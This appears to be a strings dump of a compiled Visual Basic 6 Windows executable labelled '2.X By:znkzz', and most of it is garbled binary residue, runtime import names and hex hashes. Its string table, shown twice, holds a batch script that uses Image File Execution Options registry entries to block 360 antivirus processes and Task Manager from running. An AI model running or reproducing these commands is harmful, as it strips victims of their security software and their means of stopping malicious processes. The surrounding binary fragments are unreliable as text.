2.X By:znkzz
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
Timer2
Timer1
Label3
@echo off
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\ZhuDongFangYu.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\360tray.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe" /v debugger /t reg_sz /d "ntsd -d" /f
Label2
Label1
Label1
yE81$H
VB5!6&vb6chs.dll
zE!~@Jke
Class1
yE81$H^pqD
Label1
+3qC:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Timer1
Timer2
Label2
Label3
user32
keybd_event
GetForegroundWindow
user32.dll
GetWindowTextA
GetWindowTextLengthA
FindWindowA
SetWindowTextA
SearchFiles
getCaption
+3q"=h
+3qhJu
+3qClass
C:\windows\SysWow64\MSVBVM60.DLL\3
RegisterA
RegisterB
RegisterC
RegisterD
Md5_String_Calc
Md5_File_Calc
GetValues
MD5Init
MD5Final
MD5Update
LongLeftRotate
__vbaVarSetObjAddref
VBA6.DLL
__vbaStrVarVal
__vbaVarCopy
__vbaStrToUnicode
__vbaStrToAnsi
__vbaSetSystemError
__vbaLsetFixstrFree
__vbaVarForNext
__vbaFpI4
__vbaFPInt
__vbaStrR4
__vbaVarLateMemCallLd
__vbaNew
__vbaVarSetObj
__vbaPutOwner4
__vbaStrVarCopy
__vbaPrintFile
__vbaI2Var
__vbaVarForInit
__vbaFileClose
__vbaGetOwner4
__vbaRedim
__vbaFileOpen
__vbaEnd
__vbaFreeObjList
__vbaNew2
__vbaVarDup
__vbaOnError
__vbaFixstrConstruct
__vbaErrorOverflow
__vbaAryDestruct
__vbaFreeVarList
__vbaAryUnlock
__vbaAryLock
__vbaFreeStrList
__vbaVarTstNe
__vbaFreeObj
__vbaHresultCheckObj
__vbaObjSet
__vbaVarMove
__vbaError
__vbaFreeStr
__vbaDerefAry1
__vbaStrCopy
__vbaI4Var
__vbaRedimPreserve
__vbaVarAdd
__vbaLenBstr
__vbaFreeVar
__vbaStrCat
__vbaStrMove
__vbaI2I4
__vbaUI1I2
__vbaAryConstruct2
__vbaFpUI1
__vbaVarCat
__vbaStrVarMove
__vbaUI1I4
__vbaVar2Vec
__vbaGosubFree
__vbaExitProc
__vbaGetOwner3
__vbaGosub
__vbaErase
__vbaLenVarB
__vbaAryMove
__vbaGenerateBoundsError
__vbaStrI4
FileType
SourceString
InFile
InputLen
InputBuffer
}}}}}}}|l\EWEPE
EPlPEPt
MJSEP.PSj
M3EPPu
lXEP@Puy0@X
XP7M)j
tSlPEP
XMfXf9X
#fXEPEPj
EPlPEPt
MSEPPSj
MEPPux
uEPEPj
SEP*L]L9E
MEPHEPEPj
MX|PEPj
} jdh<3@
hPEPEPE
} jPh3@
} jXh3@
MEPEPEPEPj
hPfEhOE
uujj E
MhPEPEPE
HP8P(PPPEP|
P|PEPEP9P
P|PDEPEPP
jj MmE
;PEP7E
PxP8PHP(PP
PPPPPPPP{PxPhPgj
EPXPJ
M9hPxPPPPPPPPP
PHP8PXPhPj
PxPx|x
} jPh3@
} jXh3@
1EPEPEPEPj
EPEPEPEPj
XPhPxPPPPPPPPP
P(P8PHPXPhPj
LSVWeE
VuEPgP3
EPHM`EUM
McM+MS
PEPDEEPE
jTh,3@
jPh,3@
EP@Pu>MDE
SVWeEP
SVWeE`
M_h6]@
SVWeEp
MKhJ^@
TSVWeE
]]]]P8;}
VPHEPEP
P$MQMQE
j@WVPM
MQVP4;}
UM]h_@
EP3S#EPS
j\XXSVWeE
PPuVj@YE
M/M'MO
HSVWeE
VEPEP}}}
EWEPEP+P
WVEPEP]E
MJEPEP
3EPEPj
4SVWeE
QV}}}}
QVPLuuB
EPEPEPEPEPEPj
EPEPEPEPEPEPj
E_EEPE
P]}u-EPEPEP"P"
MEPEPj
>EEEPE
Es^uS'EEEEPEP}u;EPEPEP0P0
MEPEPEPj
EEEEPEP}uEPEPEP
EEEEPEP}u1EPEPEP&P&
MEPEPEPj
EEEEPEP}u
EPEPEP
EEPEP}u
EPEPEP
EPEPEPj
EEPEP}unEPEPEPcPc
M)EPEPj
EPEPEPj
SVWeE0
MQMQ}}]V}~PPp
MQMQVPp
MQMQVPp
MQMQVPpFDMH
XSVWeE8
EP]]]]
EEj@_]E
jxX+MQM
MQMQVPpM
MQMQVPpE]E=
MQMQVPpE]E=
MQMQVPpE]E=
MQMEQE
VPOhl@
LSVWeEH
NPj@_e
f;EE~]
E\f;EE
VPPfEf
HSVWeEP
EEEEEEEEh9@
MQEMEQE
MQMQMQu
MQMQMQMQVExjE
MQMQMQM
QMQMQMQMQEVE
MQMQMQM
QMQMQMQMQVEp $]PXj
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME*
QMQMQMQMQVPX
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVPX
MQMQMQM
(QMQMQMQMQVE[]PX
MQMQMQM
,QMQMQMQMQVE\}PX
MQMQMQM
0QMQMQME"
QMQVPX
MQMQMQM
4QMQMQMQMQVEqE
MQMQMQM
8QMQMQMQMQVECy]PX
MQMQMQM
<QMQMQMQMQVE!
MQMQMQMEb%
QMQMQMQMQVP\
MQMQMQM
QMQMQMQMQVE@@E
MQMQMQM
,QMQMQMQMQVEQZ^&]P\j
MQMQMQu
MQMQMQMQVE
MQMQMQM
QMQMQMQMQVP\
MQMQMQM
(QMQMQMQMQVES
MQMQMQM
<QMQMQMQMQVE
MQMQMQM
QMQMQE}MQMQVP\
MQMQMQM
$QMQMQMQMQVE!E
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME
ZE} QMQMQMQMQVP\
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVEE
MQMQMQM
QMQMQMQMQVE
EL*}MQMQMQM
0QMQMQMQMQVP\j
MQMQMQM
QMQMQMQMQVEB9]P`
MQMQMQM
QMQMQMQMQVEqE
_MQMQMQM
,QME"am}QMQMQMQVP`
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVED
MQMQMQM
QMQMQMQMQVEKE
MQME`K}QMQM
QMQMQMQMQVP`
MQMQMQM
(QMQMQMQMQVEpE
MQMQMQM
4QMQMQMQMQVE~(]P`
MQMQMQu
MQMQMQMQVE'E
MQMQMQM
QMQMQMQMQVP`
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVE9
MQMQMQM
0QMQMQEE
MQMQVP`
MQMQMQM
<QMQMQMQMQVE|}P`
MQMQMQM
QMQMQMQMQVEeVE
MQMQMQu
MQMQMQMQVED")E
MQMQMQM
QMQMQMQMQVPd
MQMQMQM
8QMQMQMQMQVE#E
MQMQMQM
QMQMQMQMQVE9E
MQMQMQM
0QMQMQMQMQVEY[eE
QMQMQM
QMQMQMQMQVPd
MQMQMQM
(QMQMQMQMQVE}E
MQMQMQM
QMQMQMQMQVE]E
MQMQMQM
QMQMQMQMEO~oE
MQMQMQM
<QMQMQMQMQVE,E
MQMQMQM
QMQMQMQMQVE
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
MQMQMQMQVPd
MQMQMQM
,QMQMQMQMQVE5:E
MQMQMQM
QMQMQMQMQVE*E
MQMQMQM
$QMQMQMQMQVE
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
S3Wf8f
f;]]]]
QWVPlEM
QWVPlEM
QWVPlEM
QWVPlEM
SVWeE`
V3EEEE
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaFreeVarList
__vbaEnd
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaStrCat
__vbaError
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaAryDestruct
__vbaExitProc
__vbaVarForInit
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
_adj_fdivr_m16i
_CIsin
__vbaErase
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGenerateBoundsError
__vbaAryConstruct2
__vbaPutOwner4
__vbaI2I4
DllFunctionCall
__vbaFpUI1
__vbaRedimPreserve
__vbaStrR4
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
EVENT_SINK_Release
__vbaNew
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaUI1I4
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaGetOwner3
__vbaStrVarVal
__vbaVarCat
__vbaGetOwner4
__vbaI2Var
__vbaLsetFixstrFree
_CIlog
__vbaErrorOverflow
__vbaFileOpen
__vbaVar2Vec
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaVarSetObj
__vbaFreeStrList
__vbaDerefAry1
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarTstNe
__vbaI4Var
__vbaVarAdd
__vbaAryLock
__vbaVarDup
__vbaStrToAnsi
__vbaVarLateMemCallLd
__vbaFpI4
__vbaVarCopy
__vbaVarSetObjAddref
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
__vbaLenVarB
_CItan
__vbaAryUnlock
__vbaFPInt
__vbaVarForNext
_CIexp
__vbaFreeStr
__vbaFreeObj
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
C:\Users\Administrator\Desktop\
2.X.pdb
9879B1117C2F52F3F44D9A9A81AC476E
A9266167DF485E9B09A71C9F89C0D353
L!This program cannot be run in DOS mode.
#BBBL^B`BdBRichB
`.data
MSVBVM60.DLL
rjrbrrr
rvjrNr:
rrbr*<r}Artr
rr4ur9
r}irWr!NrwrSr+rgr
=r:r7ruBr
Vr2Cr:
rJlrr
rrar5r
r$br/Nrwr
rrpurkrmrIrr0lrF
yE81$HH
M%-:O3f
2.X By:znkzz
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
Timer2
Timer1
Label3
@echo off
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\ZhuDongFangYu.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\360tray.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe" /v debugger /t reg_sz /d "ntsd -d" /f
Label2
Label1
Label1
yE81$H
VB5!6&vb6chs.dll
zE!~@Jke
Class1
yE81$H^pqD
Label1
+3qC:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Timer1
Timer2
Label2
Label3
user32
keybd_event
GetForegroundWindow
user32.dll
GetWindowTextA
GetWindowTextLengthA
FindWindowA
SetWindowTextA
SearchFiles
getCaption
+3q"=h
+3qhJu
+3qClass
C:\windows\SysWow64\MSVBVM60.DLL\3
RegisterA
RegisterB
RegisterC
RegisterD
Md5_String_Calc
Md5_File_Calc
GetValues
MD5Init
MD5Final
MD5Update
LongLeftRotate
__vbaVarSetObjAddref
VBA6.DLL
__vbaStrVarVal
__vbaVarCopy
__vbaStrToUnicode
__vbaStrToAnsi
__vbaSetSystemError
__vbaLsetFixstrFree
__vbaVarForNext
__vbaFpI4
__vbaFPInt
__vbaStrR4
__vbaVarLateMemCallLd
__vbaNew
__vbaVarSetObj
__vbaPutOwner4
__vbaStrVarCopy
__vbaPrintFile
__vbaI2Var
__vbaVarForInit
__vbaFileClose
__vbaGetOwner4
__vbaRedim
__vbaFileOpen
__vbaEnd
__vbaFreeObjList
__vbaNew2
__vbaVarDup
__vbaOnError
__vbaFixstrConstruct
__vbaErrorOverflow
__vbaAryDestruct
__vbaFreeVarList
__vbaAryUnlock
__vbaAryLock
__vbaFreeStrList
__vbaVarTstNe
__vbaFreeObj
__vbaHresultCheckObj
__vbaObjSet
__vbaVarMove
__vbaError
__vbaFreeStr
__vbaDerefAry1
__vbaStrCopy
__vbaI4Var
__vbaRedimPreserve
__vbaVarAdd
__vbaLenBstr
__vbaFreeVar
__vbaStrCat
__vbaStrMove
__vbaI2I4
__vbaUI1I2
__vbaAryConstruct2
__vbaFpUI1
__vbaVarCat
__vbaStrVarMove
__vbaUI1I4
__vbaVar2Vec
__vbaGosubFree
__vbaExitProc
__vbaGetOwner3
__vbaGosub
__vbaErase
__vbaLenVarB
__vbaAryMove
__vbaGenerateBoundsError
__vbaStrI4
FileType
SourceString
InFile
InputLen
InputBuffer
}}}}}}}|l\EWEPE
EPlPEPt
MJSEP.PSj
M3EPPu
lXEP@Puy0@X
XP7M)j
tSlPEP
XMfXf9X
#fXEPEPj
EPlPEPt
MSEPPSj
MEPPux
uEPEPj
SEP*L]L9E
MEPHEPEPj
MX|PEPj
} jdh<3@
hPEPEPE
} jPh3@
} jXh3@
MEPEPEPEPj
hPfEhOE
uujj E
MhPEPEPE
HP8P(PPPEP|
P|PEPEP9P
P|PDEPEPP
jj MmE
;PEP7E
PxP8PHP(PP
PPPPPPPP{PxPhPgj
EPXPJ
M9hPxPPPPPPPPP
PHP8PXPhPj
PxPx|x
} jPh3@
} jXh3@
1EPEPEPEPj
EPEPEPEPj
XPhPxPPPPPPPPP
P(P8PHPXPhPj
LSVWeE
VuEPgP3
EPHM`EUM
McM+MS
PEPDEEPE
jTh,3@
jPh,3@
EP@Pu>MDE
SVWeEP
SVWeE`
M_h6]@
SVWeEp
MKhJ^@
TSVWeE
]]]]P8;}
VPHEPEP
P$MQMQE
j@WVPM
MQVP4;}
UM]h_@
EP3S#EPS
j\XXSVWeE
PPuVj@YE
M/M'MO
HSVWeE
VEPEP}}}
EWEPEP+P
WVEPEP]E
MJEPEP
3EPEPj
4SVWeE
QV}}}}
QVPLuuB
EPEPEPEPEPEPj
EPEPEPEPEPEPj
E_EEPE
P]}u-EPEPEP"P"
MEPEPj
>EEEPE
Es^uS'EEEEPEP}u;EPEPEP0P0
MEPEPEPj
EEEEPEP}uEPEPEP
EEEEPEP}u1EPEPEP&P&
MEPEPEPj
EEEEPEP}u
EPEPEP
EEPEP}u
EPEPEP
EPEPEPj
EEPEP}unEPEPEPcPc
M)EPEPj
EPEPEPj
SVWeE0
MQMQ}}]V}~PPp
MQMQVPp
MQMQVPp
MQMQVPpFDMH
XSVWeE8
EP]]]]
EEj@_]E
jxX+MQM
MQMQVPpM
MQMQVPpE]E=
MQMQVPpE]E=
MQMQVPpE]E=
MQMEQE
VPOhl@
LSVWeEH
NPj@_e
f;EE~]
E\f;EE
VPPfEf
HSVWeEP
EEEEEEEEh9@
MQEMEQE
MQMQMQu
MQMQMQMQVExjE
MQMQMQM
QMQMQMQMQEVE
MQMQMQM
QMQMQMQMQVEp $]PXj
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME*
QMQMQMQMQVPX
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVPX
MQMQMQM
(QMQMQMQMQVE[]PX
MQMQMQM
,QMQMQMQMQVE\}PX
MQMQMQM
0QMQMQME"
QMQVPX
MQMQMQM
4QMQMQMQMQVEqE
MQMQMQM
8QMQMQMQMQVECy]PX
MQMQMQM
<QMQMQMQMQVE!
MQMQMQMEb%
QMQMQMQMQVP\
MQMQMQM
QMQMQMQMQVE@@E
MQMQMQM
,QMQMQMQMQVEQZ^&]P\j
MQMQMQu
MQMQMQMQVE
MQMQMQM
QMQMQMQMQVP\
MQMQMQM
(QMQMQMQMQVES
MQMQMQM
<QMQMQMQMQVE
MQMQMQM
QMQMQE}MQMQVP\
MQMQMQM
$QMQMQMQMQVE!E
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME
ZE} QMQMQMQMQVP\
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVEE
MQMQMQM
QMQMQMQMQVE
EL*}MQMQMQM
0QMQMQMQMQVP\j
MQMQMQM
QMQMQMQMQVEB9]P`
MQMQMQM
QMQMQMQMQVEqE
_MQMQMQM
,QME"am}QMQMQMQVP`
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVED
MQMQMQM
QMQMQMQMQVEKE
MQME`K}QMQM
QMQMQMQMQVP`
MQMQMQM
(QMQMQMQMQVEpE
MQMQMQM
4QMQMQMQMQVE~(]P`
MQMQMQu
MQMQMQMQVE'E
MQMQMQM
QMQMQMQMQVP`
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVE9
MQMQMQM
0QMQMQEE
MQMQVP`
MQMQMQM
<QMQMQMQMQVE|}P`
MQMQMQM
QMQMQMQMQVEeVE
MQMQMQu
MQMQMQMQVED")E
MQMQMQM
QMQMQMQMQVPd
MQMQMQM
8QMQMQMQMQVE#E
MQMQMQM
QMQMQMQMQVE9E
MQMQMQM
0QMQMQMQMQVEY[eE
QMQMQM
QMQMQMQMQVPd
MQMQMQM
(QMQMQMQMQVE}E
MQMQMQM
QMQMQMQMQVE]E
MQMQMQM
QMQMQMQMEO~oE
MQMQMQM
<QMQMQMQMQVE,E
MQMQMQM
QMQMQMQMQVE
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
MQMQMQMQVPd
MQMQMQM
,QMQMQMQMQVE5:E
MQMQMQM
QMQMQMQMQVE*E
MQMQMQM
$QMQMQMQMQVE
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
S3Wf8f
f;]]]]
QWVPlEM
QWVPlEM
QWVPlEM
QWVPlEM
SVWeE`
V3EEEE
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaFreeVarList
__vbaEnd
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaStrCat
__vbaError
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaAryDestruct
__vbaExitProc
__vbaVarForInit
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
_adj_fdivr_m16i
_CIsin
__vbaErase
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGenerateBoundsError
__vbaAryConstruct2
__vbaPutOwner4
__vbaI2I4
DllFunctionCall
__vbaFpUI1
__vbaRedimPreserve
__vbaStrR4
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
EVENT_SINK_Release
__vbaNew
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaUI1I4
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaGetOwner3
__vbaStrVarVal
__vbaVarCat
__vbaGetOwner4
__vbaI2Var
__vbaLsetFixstrFree
_CIlog
__vbaErrorOverflow
__vbaFileOpen
__vbaVar2Vec
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaVarSetObj
__vbaFreeStrList
__vbaDerefAry1
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarTstNe
__vbaI4Var
__vbaVarAdd
__vbaAryLock
__vbaVarDup
__vbaStrToAnsi
__vbaVarLateMemCallLd
__vbaFpI4
__vbaVarCopy
__vbaVarSetObjAddref
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
__vbaLenVarB
_CItan
__vbaAryUnlock
__vbaFPInt
__vbaVarForNext
_CIexp
__vbaFreeStr
__vbaFreeObj
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
C:\Users\Administrator\Desktop\
2.X.pdb
9879B1117C2F52F3F44D9A9A81AC476E
27CA0FCD2DAAE7A7EB747D3A145576A4
5248EB67C12453E6095825C3CA5AB511
EFA98277E63887E8D73701C276868D89
0EBF4B91B831E1C425F726148AE62E7C
0D3FA8E553D5B7E42230F708A5D4FE5A
2EE3A67B8F6B311C4DD1D485499D5E0F
A7348EB77690DE798787AA6307DA3605
73C442FD8006A7C4417B7738123891E4
61185570E75D2D7609C78E5468698018
B2E9DFE412DF6091909609CD0AA81C2F
09A63360C0EF11E8A24CF5AFFD14660F
27BAF0A25FB914D641CF5045F9C20C9C
3AB6330808D43501A7CAF40C68830149
DX8QPWTL
DX8QPWTL
DX8QPWTL
X8QPWT
P4WTSPh
4PPWTPh
SuPHPh
VWXTcjd_
SXP3hl
H<PVLa
H3<Q@PWTP
HX<QPWTP
HX<QPWTP
HX<QPWTP
HX<QPWTP
X<QPWT
VWXT\ajd_
H<PVLa
H3<Q@PWTP
HX<QPWT
HX<QPWTP
HX<QPWT
HX<QPWT
HX<QPWT3C@P
X<QPWT@
<8O<D0QPhM
@PqG|2F
VS^_3[]
VWEZ3X}uZ`jZ_ZTZ(IZ
((7F&F
FXXEEM_d
SVWXEX3}XWWh
S!t!xho
SW3EX\ho
T}J<;u
=((=XX=
=``n=]=MT
VXE.P3j
*9;u)E
y4XX7_[Md
VXEJ3j
#4;u)HE
3;v:9,
XPt9(
3+tSHt=Ht'Ht
?3_[Md
PQXP E
H@@<RQP
XTI@5|o
@4PDSa
@34Q@PWTH
@X4QPWTH
@X4QPWTH
@X4QPWTH
@X4QPWTH
X4QPWT
PLWTSPh
LPPWTPh
SuPHPh
tKWPhI
X6PXP$09H
vLWPhQ
XP4XP,9x
vLWPhJ
XPXP|,9
vLWPhK
XPXP(,9
vLWPhL
XP8XP,`
#tiWPhM
XPXPc
#XX#M^d
XT63SjdX]W"j
tVWXPhN
t!tVWXPhO
PTXPV|
!tOWXPhP
QTPP09Lt0WXPh[
PTXPV @]bX
t!M_^d
WXT(A4F
(v1Wjd(E
4/X}&/E
VPjdWkX
VXPjrW[X
j0d5po
VXPjdWW
VPjdWE
VXPjrW%W
j0d5po
3@M_^d
VXPjdWE
$`Y`VPhs
VXPjdWE
,j0d4W
X/)($)
V(PjdWE
j04dW
SVW33G;EE
xPPtPS|t
(&]&&X&
V(PjdSE
(R#X}D#9#
3@M_^d
W3WS S
EPuWSj
3uLPho
PjgYYj
;tc90t_Vj
VPjdS@
}*VXPjrj
j0d5po
VPjdSY?
PP}*VXPjrj
j0d5po
VPjdS&>
P}*VXPjrj
j0d5po
VPjdS<
P;})VXPjrSX<
j0d5po
+tGHt5Ht#Ht
df8hCVXPhO
+VXPhN
V(PjdWE
VPjrWN9
j045po
YY2XX!
(PXch`Q
(PXh`Q
((wXXfM_^d
df0\Ph
uijdhQ
9hv=LPPPTPXPhQ
Vjn[hQ
f04V5po
XX((|``kZI8Md
u<EPSj
UDSVWh
EEP5po
W3WuEP
E+EWPE+EPE+E
EPW5to
+V4YJ\`
+Vs;5``
3_^[;5l`
SWE30}j
f8@@f98uVW
Wd45po
X``UV`Ph
V(PjnW%
Wld5po
9,(t hR
Xb(WV(Ph
V`PjnW#
W4d5po
((JXX9(
P3Vh<L
M3Fx5Ho
VVWUYu\3A9
VVdV5po
vTl3|j
WXPjdVE
Vd5po
jqYYxMh
WPjd3VE
WXPjiV
j0d5po
W(PjdVE
ddP+@j
XXn]L((;3VVh/
;t?95o
SWPj5|o
SXPjlVE
S(PjdV3
PWdPo095
((XXMl
W3WWEE
uK\Ph`
`PWh4S
v*GGf? w f="
dGtpWq
dstpW,
W'@Pj.} =o
&39u9=o
4PjsWc
NYYShN
t7ShTN
YYShTN
t7Sh(N
YYSh(N
V4Pjd3W
FYYShN
t7ShTN
YYShTN
t7Sh(N
~YYSh(N
twf}66
t7ShTN
YYShTN
t7Sh(N
PYYSh(N
uG`P3PPh
Wdt@Pj d~
lPjfVz
fd[PM_^[w
fDV*^]
_3_^[]
URuPQT|+}
URuPQT|+}
U SVW3S
UREuTq
|P9]tKEP]
PQHE;t
dE{VdXpG
YYu#9`u
YM_^[m
PqXPWV6
W3}X(hZ
`((OXX>-
S df8o
VXWWPX>Yo
;t=PhxU
VX`WWPXXo
;t=PhHU
WWPXXo
VXWWPXlXo
;t=PhT
VXWWPX&Xo
;t=PhT
VXHWWPXWo
;t=PhT
WWPXW9ht_hxT
WWXP(GW4hDT
CdDdPWphZ
804W,E
;LtHXP
P0XPht\
8;t1XQ
PXPh`\
D;t1XQ
PXPhL\
H;t1XQ
PuXPh4\
P;Lu<;
P;Lu8;t+hD[
TD;t+h
TH;t+hZ
XET,23
40TPh^
,YYP;H
SVWXET
P0DPh^
SyYY^W3Gt
t+Ht!Ht
+t+Ht!Ht
YYhPd
PiK -f
Y|jv(T,u
WpVWis
WJ3098
RPTDHQv<Ph0s
YYhPd
VXJOuXP
7v!;hs
XX{M_^d
3SEEEA
E0EPhx
SV3;WE
WVW37(
W/YYhPd
WLVWEs
WYY3M_^d
SVW3;E
@PaPh0
YYt"7h
WSm0Xe
@Pj\y~
y3M_^d
PX4XPhx
PXyXPhx
PX$XPhx
PXiXPhx
P(lh,T
\ 3*qM_^d
E0EPh0
E0EPh0
YY^ltD`
W~VWws
WSYY3_^
PX:zXPh
PXyXPh\
dXXd$b
YYhPd
3((*`M_^d
XHTPrHPhH
PV;YYt
PVh;YYt
PV<;YYt
PX`lHXPh
V@YYh
XPVWV^h
XPViWV
X3M_^d
WXTDk3
Hu3d(hh
TYYh,T
nT``]T\
T#YYh,T
SS((SXXSM_^d
ZN48V0E
NLPVHE
NptVlE
2O@DV<E
hO(,V$E
OdhV`E
PX\VTE
|q!|^%|K=Pq
Wffffff
YY]j`h
3{FF3f
FFW](j
w\SVP9
YE;t:FHE;r
9}uX;u
E;t0FHE;r
9}u";u
EE;u`9=t
3CSVW5`
UQQSVWd5
SVWE3PPPuu
E_^[E]
USVWUj
P(RP$R
t5|$(t
;t$(v(4v
UQPXY]Y[
@@fu+E
fSt8+f
@@fu3[_]
@@fufM
HLNLHPNPP3Y`
vPVLPQE
Y3^_[]
AABBM
tJf9}tDf9Et<}
3F95xr
3MYY[]
31YY[]
SVEW3;
@u+@<v)P
UQSVW>
<"u>"u
3Y[^_5Xr
@B8\t8"u&
UQQSVW39=
W33;u.
;tuf9t
SSS+S@PWSSE;
;YEt!SSuPuWSS
uGY]]W
;rSVWEP
YYt(V5
PYF,;t
PYF4;t
PYF<;t
PYFD;t
PYFH;t
PYFT=pa
Y}F`E;t
FdE;tM
YYt+V5
3@^p3^
3]3@]h
+SVWEePEEEEd
Y_^[QVC20XC00U
33333]^]
]_^[]UL$
f;rof=p
f;r_f=Z
f;rOf=
rBPf;rAf=*
f;r1f=J
f;r!f=
3"p@d;
VDYYFu
WYYuf_]h0
PyYYtF
YYGG3f
YfdtSfitMfotGfxtAfXu
1ht lt
g~Bit!n
(j-_f;u
YtdV(PW
GGf?^u
f]t`FFf9s
jx^f;tZfXtT
S~YYj0[
ptBuf%
F$|3@_^
k3Y@_^]
W3;u4DP
MOI;|9M
WI <}}
MLD3#um
#Mj _^{
;]r;]u&
]#\D\D
FF@@u3
YYE@xE@|EpxM
EE8csmu%Ex
EPQ3VW
GuRYMHxMH|>csmu6~
tu$u u
WEPEPVu u
;EsVS;7|B;w
;Er[_^
Wcsm9>
}EPEPWu u
(u$u ]u
VYY_^[
u u$u uu
tP8csmu,9x
U$Ru u
P 3@_^]j
VW_^]M
It7ht&lt
HHtxHHtt
@@@u3@t
t-RPWS
CYCY~9PM
PvCC>Yt
j ^f;r
It6ht&lt
}]UZtg
@@@u3@t
t-RPWSH/
uH80t8
A80t.F
EVM(^[
uMSW<t
D=VP YYtG;|fE
YYM_^[@=
r$$w@
W=YEMT
tc;t_F,98uXF4;t
YYF0;t
YYv,}v<uYYF@;
PZvDRYYFP;
vP+YYV#Y_^]
3;t/A,
QoYFd^j
W>+~'WPv
7Y}3u;5@
tVPVDYY3BU y
qtb+tG
VbtFHt+
Y]3u;5@
4VYY y
GIt%t)
Gt/KuD$
GKu[^D$
VPVPV5v
@;rD3Ar
@;vAAy
YE;uo>
EtVMf9MZ
_^[j$h
33F9=lu
u2EPVh|
M3F]39}u
SVeYYE;tuWWSuu
P}YEtnu
fNPSuu
E_WEPE
UDSVWj
E3;}M]
@@Ju;t
;tD9]u?8\
EPSRWjQSv
M_^[.x
BG;U|E
EPSSSjQSv
;F(r(8_
t#F(39]
DDDDDDDDDDDDDD
;|P+;E
ue9t-j
*09)Y+
s9~(~
j YjY+
VWj Y}
PjY+3BR0H%
Yj^+3B
QP4YYu
<+3E_^[
|3@]3]
SVWj ^]
EPEPEWPv
@PEP 3;>v
|!3}MEP^
fYY3jY+N
3QQQEE
QPEPEP#
EVPM$^vh
3QQQEE
QPEPEP#
EVPdM$^.h
tAt2t$
